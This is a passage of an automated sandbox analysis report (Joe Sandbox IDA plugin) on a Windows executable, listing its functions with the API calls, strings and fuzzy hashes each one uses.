Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1255039815-0
Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
Instruction ID: 4786a4e3af76c9909d416a3d432b6aad4743a79d0828e8a607f41f0a18382fec
Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
Instruction Fuzzy Hash: D9619FA2B0665186EB10EF61DC405BDB7B4FB85F88B868035DE09637E9DF39D845C360

Function 00007FF7A52366B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF7A5236717
CoUninitialize.OLE32 ref: 00007FF7A5236721
CoCreateInstance.OLE32 ref: 00007FF7A5236791
IIDFromString.OLE32 ref: 00007FF7A5236810
VariantInit.OLEAUT32 ref: 00007FF7A52368AF
VariantClear.OLEAUT32 ref: 00007FF7A5236900

Strings

Failed to create object, xrefs: 00007FF7A523679B
NULL Pointer assignment, xrefs: 00007FF7A52367DE
Invalid parameter, xrefs: 00007FF7A5236828

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
Instruction ID: 692faa7a0575090c07de96377614f35212b85fb36799f808ae977e57263e62f1
Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
Instruction Fuzzy Hash: 897163A2A09A0685EB18AF25D8401BDA774FB46FA8F964431DE0E477B9DF3CE445C360

Function 00007FF7A5236C34 Relevance: 15.3, APIs: 10, Instructions: 296fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF7A5236C76
CoInitialize.OLE32 ref: 00007FF7A5236CA4
CoUninitialize.OLE32 ref: 00007FF7A5236CAF
GetRunningObjectTable.OLE32 ref: 00007FF7A5236DD9
SetErrorMode.KERNEL32 ref: 00007FF7A5236EF7
CoGetInstanceFromFile.OLE32 ref: 00007FF7A5236F49
CoGetObject.OLE32 ref: 00007FF7A5236F69
SetErrorMode.KERNEL32 ref: 00007FF7A5236F81
SetErrorMode.KERNEL32 ref: 00007FF7A523701B
VariantClear.OLEAUT32 ref: 00007FF7A523702E

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
Instruction ID: 72836698b21fd21f9c5c9101ea1ea9f7fabe8a1a0465553f0027bf323c6bb5fc
Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
Instruction Fuzzy Hash: 37D19072B06B4686EB14AF65D8401ACB3B5FB95F98B924036CE0D57BA8DF38E449C350

Function 00007FF7A524A59C Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00007FF7A524A650
SendMessageW.USER32 ref: 00007FF7A524A664
GetWindowLongW.USER32 ref: 00007FF7A524A697
SendMessageW.USER32 ref: 00007FF7A524A6C1
SendMessageW.USER32 ref: 00007FF7A524A752
SendMessageW.USER32 ref: 00007FF7A524A7A6
SendMessageW.USER32 ref: 00007FF7A524A7CD
SendMessageW.USER32 ref: 00007FF7A524A7F1
SendMessageW.USER32 ref: 00007FF7A524A80E
SendMessageW.USER32 ref: 00007FF7A524A832

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
Instruction ID: be7cff5ec5b1b7300fa081cea713d97bef9876b9e200f5de0cc926e5a8dfd853
Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
Instruction Fuzzy Hash: C771C076616A8185E720DF65E8446ED7760FBCAF94F820032EA4D47BA8CF3DD186C710

Function 00007FF7A5230D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF7A5230D62
EmptyClipboard.USER32 ref: 00007FF7A5230D68
GlobalAlloc.KERNEL32 ref: 00007FF7A5230D80
CloseClipboard.USER32 ref: 00007FF7A5230E72

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
Instruction ID: 80df668f96c2958031cbc286b27af649b6d8a0641fab70247cf74196593f8dd0
Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
Instruction Fuzzy Hash: 6B417FB2B0A64282EB05AF15E894378B760FF56F95F864434DA0E077BACF7DE0458724

Function 00007FF7A521B7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A56D4: GetFullPathNameW.KERNEL32(?,00007FF7A51A56C1,?,00007FF7A51A7A0C,?,?,?,00007FF7A51A109E), ref: 00007FF7A51A56FF

Part of subcall function 00007FF7A521CED4: GetFileAttributesW.KERNEL32 ref: 00007FF7A521CED8

FindFirstFileW.KERNEL32 ref: 00007FF7A521B8AC
DeleteFileW.KERNEL32 ref: 00007FF7A521B987
MoveFileW.KERNEL32 ref: 00007FF7A521B9A7
DeleteFileW.KERNEL32 ref: 00007FF7A521B9CA
FindNextFileW.KERNEL32 ref: 00007FF7A521B9FC
FindClose.KERNEL32 ref: 00007FF7A521BA15

Part of subcall function 00007FF7A521BA80: CopyFileExW.KERNEL32 ref: 00007FF7A521BAA7

Strings

\*.*, xrefs: 00007FF7A521B849, 00007FF7A521B867

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4047182710-1173974218
Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
Instruction ID: 4d63aa0988a3f76c10c8d273dc98f6e728223b2af96bc7a2187749971bc78891
Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
Instruction Fuzzy Hash: DE812362A09A4295EB11FB61E8401FEAB60FF95B94FC21032EA4E465FEDF2CD585C710

Function 00007FF7A51E2650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7A51E2673

Part of subcall function 00007FF7A51E1C40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E1C54

_get_daylight.LIBCMT ref: 00007FF7A51E2684

Part of subcall function 00007FF7A51E1BE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E1BF4

_get_daylight.LIBCMT ref: 00007FF7A51E2695

Part of subcall function 00007FF7A51E1C10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E1C24

Part of subcall function 00007FF7A51DB3C0: RtlFreeHeap.NTDLL ref: 00007FF7A51DB3D6
Part of subcall function 00007FF7A51DB3C0: GetLastError.KERNEL32 ref: 00007FF7A51DB3E8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A51E28F5), ref: 00007FF7A51E26BC
WideCharToMultiByte.KERNEL32 ref: 00007FF7A51E2752
WideCharToMultiByte.KERNEL32 ref: 00007FF7A51E279E

Strings

?, xrefs: 00007FF7A51E2791

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
String ID: ?
API String ID: 500310315-1684325040
Opcode ID: 95b5e6a413fed930f1bb5b391612c789b8d09045f7789be0dd1e1e78d96feb17
Instruction ID: c4f98b4871f16b508f950aa2f1f2245c99ac6ae4adf60e2e221b0d605287d6b5
Opcode Fuzzy Hash: 95b5e6a413fed930f1bb5b391612c789b8d09045f7789be0dd1e1e78d96feb17
Instruction Fuzzy Hash: C061A072A19642C6E711EF21E8505B9B7A4FB8AB94FC20135EE1D826B8DF3CD441C760

Function 00007FF7A5233940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32 ref: 00007FF7A52339DA
WSAGetLastError.WSOCK32 ref: 00007FF7A52339EC
bind.WSOCK32 ref: 00007FF7A5233A3A
WSAGetLastError.WSOCK32 ref: 00007FF7A5233A44
closesocket.WSOCK32 ref: 00007FF7A5233A70
listen.WSOCK32 ref: 00007FF7A5233A7E
WSAGetLastError.WSOCK32 ref: 00007FF7A5233A94
closesocket.WSOCK32 ref: 00007FF7A5233AC0

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
Instruction ID: 26528c4c9c53dda1ed9d62292cf363aac73e63fa2d22758f59cb9996e0876a0e
Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
Instruction Fuzzy Hash: F141B4A2B0964286EB15FF16E850278A750FF96FA0F864630DA5E477EACF7CE141C710

Function 00007FF7A5238360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00007FF7A52383EA
NULL Pointer assignment, xrefs: 00007FF7A5238831

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
Instruction ID: 40b27b5278d1177ead6bfd80cea6ec2ed91ddf7fb9a4ad781fad566fa122868e
Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
Instruction Fuzzy Hash: 85E106BAA0AB8296EB14DF25D8401ADB7A0FB85B64F814136DF4D0BBA8DF3CD545C710

Function 00007FF7A5218E18 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00007FF7A5218E69
GetKeyboardState.USER32 ref: 00007FF7A5218E7D
SetKeyboardState.USER32 ref: 00007FF7A5218ECC
PostMessageW.USER32 ref: 00007FF7A5218EF9
PostMessageW.USER32 ref: 00007FF7A5218F21
PostMessageW.USER32 ref: 00007FF7A5218F6C
PostMessageW.USER32 ref: 00007FF7A5218F98

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
Instruction ID: f73369a97c3b2f86166608c2b42b2e0819c841d7f36a42431e79ece251a87182
Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
Instruction Fuzzy Hash: 0951B1A2A0E2D161F76197715D4067AEFA1FB47FC0FCA8074EA8907E9ACA1DE4548331

Function 00007FF7A521BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A56D4: GetFullPathNameW.KERNEL32(?,00007FF7A51A56C1,?,00007FF7A51A7A0C,?,?,?,00007FF7A51A109E), ref: 00007FF7A51A56FF

Part of subcall function 00007FF7A521CED4: GetFileAttributesW.KERNEL32 ref: 00007FF7A521CED8

FindFirstFileW.KERNEL32 ref: 00007FF7A521BD09
DeleteFileW.KERNEL32 ref: 00007FF7A521BD5B
FindNextFileW.KERNEL32 ref: 00007FF7A521BD6D
FindClose.KERNEL32 ref: 00007FF7A521BD7F
FindClose.KERNEL32 ref: 00007FF7A521BD8A

Strings

\*.*, xrefs: 00007FF7A521BCD3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
Instruction ID: 3949aa16cc7416dfdd86a58ba366ac39d0d44725fd307c4550e585b498d29976
Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
Instruction Fuzzy Hash: FB41B072A29A4282EA51EB20E8401BDA360FF95F90FD21032EA5E036EDDF7CD505C720

Function 00007FF7A51DAF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7A51DAFD1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7A51DAFE9
RtlVirtualUnwind.KERNEL32 ref: 00007FF7A51DB024
IsDebuggerPresent.KERNEL32 ref: 00007FF7A51DB05D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7A51DB067
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7A51DB072

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
Instruction ID: 30f52b259e82a37dccd01e32a0bd34e9a9028585e27e91884fd09a3bb4d23669
Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
Instruction Fuzzy Hash: 0A31A636619B8186E720EF24E8402BDB3B4FB85B54F910136EA9D43BA8DF3CD545CB10

Function 00007FF7A522A874 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118filesleepCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF7A522A8F4
FindClose.KERNEL32 ref: 00007FF7A522AA15

Part of subcall function 00007FF7A5223824: GetInputState.USER32 ref: 00007FF7A5223889
Part of subcall function 00007FF7A5223824: PeekMessageW.USER32 ref: 00007FF7A5223938

Sleep.KERNEL32 ref: 00007FF7A522A939
FindNextFileW.KERNEL32 ref: 00007FF7A522AA00

Strings

*.*, xrefs: 00007FF7A522A8B3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
String ID: *.*
API String ID: 1927845040-438819550
Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
Instruction ID: 38b2e9829c50dca2f301317fa20c0577d533578027233b5f4bdce48e9ae02a22
Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
Instruction Fuzzy Hash: 6A51A36660AA8295EB11EB15E8801BDA3B0FB46B94F920132DE4D43BFDDF7CE545C710

Function 00007FF7A5234074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5235E00: inet_addr.WSOCK32(?,?,?,?,?,?,?,00007FF7A52337FB), ref: 00007FF7A5235E4D

socket.WSOCK32 ref: 00007FF7A52340FC
WSAGetLastError.WSOCK32 ref: 00007FF7A523412D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
Instruction ID: 3ef8d3cc5bef84b9ad88f7a79dc8c07d366e8e549646dbaa57a47ebe362b5f88
Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
Instruction Fuzzy Hash: AE511861B0965281DB16FB12E804679AB90FB8BFE0FC64531DE5E077EACE3CD5008790

Function 00007FF7A51D793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF7A51D7A8E

Strings

!, xrefs: 00007FF7A51D7A7A
fmod, xrefs: 00007FF7A51D7A58
VUUU, xrefs: 00007FF7A51D7B5B

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _handle_error
String ID: !$VUUU$fmod
API String ID: 1757819995-2579133210
Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
Instruction ID: 73c3887818de90782f2a5d3c99cc00839fdba14e1c50c86c773ca569506512a0
Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
Instruction Fuzzy Hash: C6B12B22A1EFC544D6B38A34A0413B6F399AFAB790F55C332D94E35AB4DF2C95C28700

Function 00007FF7A51E2D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E2D60

Part of subcall function 00007FF7A51DB184: GetCurrentProcess.KERNEL32(00007FF7A51DB21D), ref: 00007FF7A51DB1B1

Strings

., xrefs: 00007FF7A51E3198
., xrefs: 00007FF7A51E31A7
*, xrefs: 00007FF7A51E2D87

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
